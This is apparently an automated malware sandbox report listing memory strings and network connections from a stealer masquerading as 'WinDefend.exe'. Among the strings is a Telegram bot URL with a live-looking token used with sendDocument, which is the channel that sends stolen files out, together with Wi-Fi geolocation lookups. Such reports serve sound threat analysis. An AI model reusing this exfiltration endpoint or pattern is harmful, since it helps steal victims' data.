Source: Client.exe, 00000002.00000002.2034934534.00000000026A3000.00000004.00000800.00020000.00000000.sdmp, Infected.exe, 00000003.00000002.2032453597.00000000028D6000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000004.00000002.3288846438.0000000002EDD000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000014.00000002.2527964251.00000000028C1000.00000004.00000800.00020000.00000000.sdmp, Loaader.exe, 00000015.00000002.3282228143.0000000003071000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.0000000002E71000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.2270356962.0000015CC054B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.2270201897.0000019133BD1000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 0000001F.00000002.3288810827.0000000002C11000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002F.00000002.2307883969.0000029A09D51000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000030.00000002.2306321177.0000013E8D9E1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: Amcache.hve.30.dr String found in binary or memory: http://upx.sf.net
Source: powershell.exe, 00000030.00000002.2306321177.0000013E8DC08000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: Loaader.exe, 00000015.00000002.3394522285.000000001319F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.codeplex.com/DotNetZip
Source: powershell.exe, 00000030.00000002.3074256391.0000013EA5BE0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.microsoft.co
Source: Loader.exe, 00000014.00000002.2662012790.000000001294A000.00000004.00000800.00020000.00000000.sdmp, Loaader.exe, 00000015.00000002.3394522285.00000000139A5000.00000004.00000800.00020000.00000000.sdmp, tmpAA25.tmp.dat.20.dr, tmp5D77.tmp.dat.21.dr, tmp5E08.tmp.dat.21.dr String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: powershell.exe, 00000019.00000002.2270356962.0000015CC054B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.2270201897.0000019133BD1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002F.00000002.2307883969.0000029A09D51000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000030.00000002.2306321177.0000013E8D9E1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore68
Source: Loaader.exe, 00000015.00000002.3282228143.000000000372A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.mylnikPX
Source: Loaader.exe, 00000015.00000002.3282228143.000000000372A000.00000004.00000800.00020000.00000000.sdmp, Loaader.exe, 00000015.00000002.3282228143.00000000031AB000.00000004.00000800.00020000.00000000.sdmp, Loaader.exe, 00000015.00000002.3282228143.0000000003246000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.mylnikov.org
Source: Loaader.exe, 00000015.00000002.3282228143.000000000372A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.mylnikov.org/geolocation/wifi?v=1.1&
Source: Loaader.exe, 00000015.00000002.3282228143.000000000372A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.mylnikov.org/geolocation/wifi?v=1.1&bssid=
Source: Loaader.exe, 00000015.00000002.3282228143.000000000372A000.00000004.00000800.00020000.00000000.sdmp, Loaader.exe, 00000015.00000002.3282228143.00000000031AB000.00000004.00000800.00020000.00000000.sdmp, Loaader.exe, 00000015.00000002.3282228143.0000000003246000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.mylnikov.org/geolocation/wifi?v=1.1&bssid=00:50:56:a7:21:15
Source: Loaader.exe, 00000015.00000002.3282228143.000000000372A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.mylnikov.org/geolocation/wifi?v=1.p
Source: WinDefend.exe, 00000004.00000002.3288846438.0000000003522000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000004.00000002.3288846438.0000000002F1F000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.0000000002EBF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org
Source: WinDefend.exe, 00000004.00000002.3288846438.0000000002ED1000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.0000000002E71000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 0000001F.00000002.3288810827.0000000002C11000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot
Source: WinDefend.exe, 00000004.00000002.3288846438.00000000034C1000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000004.00000002.3288846438.000000000354F000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000004.00000002.3288846438.000000000352D000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000004.00000002.3288846438.00000000034E6000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.0000000003299000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.00000000034A3000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.0000000003484000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.000000000323F000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.000000000327D000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.000000000325D000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.0000000003549000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.0000000003517000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.00000000034FA000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.000000000346F000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.000000000321B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDoc
Source: WinDefend.exe, 00000004.00000002.3288846438.000000000324E000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000004.00000002.3288846438.0000000003045000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000004.00000002.3288846438.00000000034C1000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000004.00000002.3288846438.0000000003314000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000004.00000002.3288846438.000000000327B000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000004.00000002.3288846438.0000000003076000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000004.00000002.3288846438.000000000354F000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000004.00000002.3288846438.000000000332D000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000004.00000002.3288846438.000000000352D000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000004.00000002.3288846438.00000000030C6000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000004.00000002.3288846438.00000000034E6000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000004.00000002.3288846438.0000000003345000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.0000000003299000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.00000000034A3000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.00000000031FA000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.0000000003484000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.0000000003018000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.000000000323F000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.000000000327D000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 
00000016.00000002.3288493213.000000000325D000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.0000000003549000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument
Source: unknown Network traffic detected: HTTP traffic on port 61160 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61301
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61302
Source: unknown Network traffic detected: HTTP traffic on port 61116 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 61219 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 61303 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 61172 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 61137 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61314
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61315
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61316
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61317
Source: unknown Network traffic detected: HTTP traffic on port 61232 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61318
Source: unknown Network traffic detected: HTTP traffic on port 61066 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61319
Source: unknown Network traffic detected: HTTP traffic on port 61314 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61310
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61311
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61312
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61313
Source: unknown Network traffic detected: HTTP traffic on port 61325 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 61302 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 61194 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 61171 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 61287 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61204
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61325
Source: unknown Network traffic detected: HTTP traffic on port 61126 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61205
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61326
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61206
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61207
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61208
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61209
Source: unknown Network traffic detected: HTTP traffic on port 61231 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 61254 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61320
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61321
Source: unknown Network traffic detected: HTTP traffic on port 61149 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61201
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61322
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61323
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61203
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61324
Source: unknown Network traffic detected: HTTP traffic on port 61078 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 61265 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61215
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61216
Source: unknown Network traffic detected: HTTP traffic on port 61104 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61217
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61218
Source: unknown Network traffic detected: HTTP traffic on port 61089 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61219
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61210
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61211
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61212
Source: unknown Network traffic detected: HTTP traffic on port 61033 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61213
Source: unknown Network traffic detected: HTTP traffic on port 61276 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61214
Source: unknown Network traffic detected: HTTP traffic on port 61115 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61190
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61191
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61071
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61192
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61193
Source: unknown Network traffic detected: HTTP traffic on port 61058 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61194
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61073
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61074
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61195
Source: unknown Network traffic detected: HTTP traffic on port 61196 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 61173 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 61150 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 61138 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 61093 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61185
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61065
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61186
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61066
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61187
Source: unknown Network traffic detected: HTTP traffic on port 61218 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61067
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61188
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61068
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61189
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61069
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61082
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61083
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61084
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61085
Source: unknown Network traffic detected: HTTP traffic on port 61242 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 61229 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 61288 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 61127 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61196
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61076
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61197
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61077
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61198
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61078
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61199
Source: unknown Network traffic detected: HTTP traffic on port 61253 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61079
Source: unknown Network traffic detected: HTTP traffic on port 61161 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 61299 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 61310 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61091
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61092
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61093
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61094
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61096
Source: unknown Network traffic detected: HTTP traffic on port 61241 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 61264 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 61103 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 61321 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61086
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61087
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61088
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61089
Source: unknown Network traffic detected: HTTP traffic on port 61162 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 61277 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 61139 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 61082 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 61309 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 61195 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 61071 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 61207 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 61230 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61097
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61098
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61099
Source: unknown Network traffic detected: HTTP traffic on port 61184 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 61140 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 61186 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61270
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61150
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61271
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61151
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61272
Source: unknown Network traffic detected: HTTP traffic on port 61289 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 61300 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 61048 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 61323 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 61228 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61149
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61029
Source: unknown Network traffic detected: HTTP traffic on port 61240 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61020
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61141
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61262
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61021
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61142
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61263
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61143
Source: unknown Network traffic detected: HTTP traffic on port 61252 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61264
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61144
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61265
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61145
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61266
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61146
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61267
Source: unknown Network traffic detected: HTTP traffic on port 61128 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61147
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61268
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61269
Source: unknown Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 61059 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61280
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61160
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61281
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61040
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61161
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61282
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61162
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61283
Source: unknown Network traffic detected: HTTP traffic on port 61263 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 61151 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 61175 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 61205 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61273
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61153
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61274
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61033
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61154
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61275
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61034
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61155
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61276
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61156
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61277
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61036
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61157
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61278
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61158
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61279
Source: unknown Network traffic detected: HTTP traffic on port 61014 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61038
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61159
Source: unknown Network traffic detected: HTTP traffic on port 61278 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 61113 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61290
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61170
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61291
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61171
Source: unknown Network traffic detected: HTTP traffic on port 61251 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61292
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61051
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61172
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61293
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61173
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61294
Source: unknown Network traffic detected: HTTP traffic on port 61197 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 61206 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 61069 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61042
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61163
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61284
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61043
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61164
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61285
Source: unknown Network traffic detected: HTTP traffic on port 61290 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61165
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61044
Source: unknown Network traffic detected: HTTP traffic on port 61036 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 61239 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61286
Source: unknown Network traffic detected: HTTP traffic on port 61311 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61166
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61287
Source: unknown Network traffic detected: HTTP traffic on port 61185 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61288
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61168
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61289
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61048
Source: unknown Network traffic detected: HTTP traffic on port 61013 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61049
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61180
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61060
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61181
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61061
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61182
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61062
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61183
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61063
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61184
Source: unknown Network traffic detected: HTTP traffic on port 61322 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 61174 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 61092 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 61262 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61053
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61174
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61295
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61054
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61175
Source: unknown Network traffic detected: HTTP traffic on port 61217 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61296
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61055
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61176
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61297
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61177
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61298
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61178
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61299
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61058
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61179
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61059
Source: unknown Network traffic detected: HTTP traffic on port 61163 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 61129 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 61153 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 61176 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 61199 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 61101 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 61038 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 61015 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 61279 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 61164 -> 443
Source: unknown HTTPS traffic detected: 64.185.227.155:443 -> 192.168.2.5:49704 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49707 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61013 version: TLS 1.2
Source: unknown HTTPS traffic detected: 64.185.227.155:443 -> 192.168.2.5:61014 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61016 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61017 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61033 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61036 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61038 version: TLS 1.2
Source: unknown HTTPS traffic detected: 64.185.227.155:443 -> 192.168.2.5:61040 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61044 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61063 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61065 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61071 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61079 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61096 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61110 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61113 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61116 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61120 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61131 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61132 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61134 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61136 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61137 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61139 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61140 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61142 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61145 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61146 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61149 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61153 version: TLS 1.2
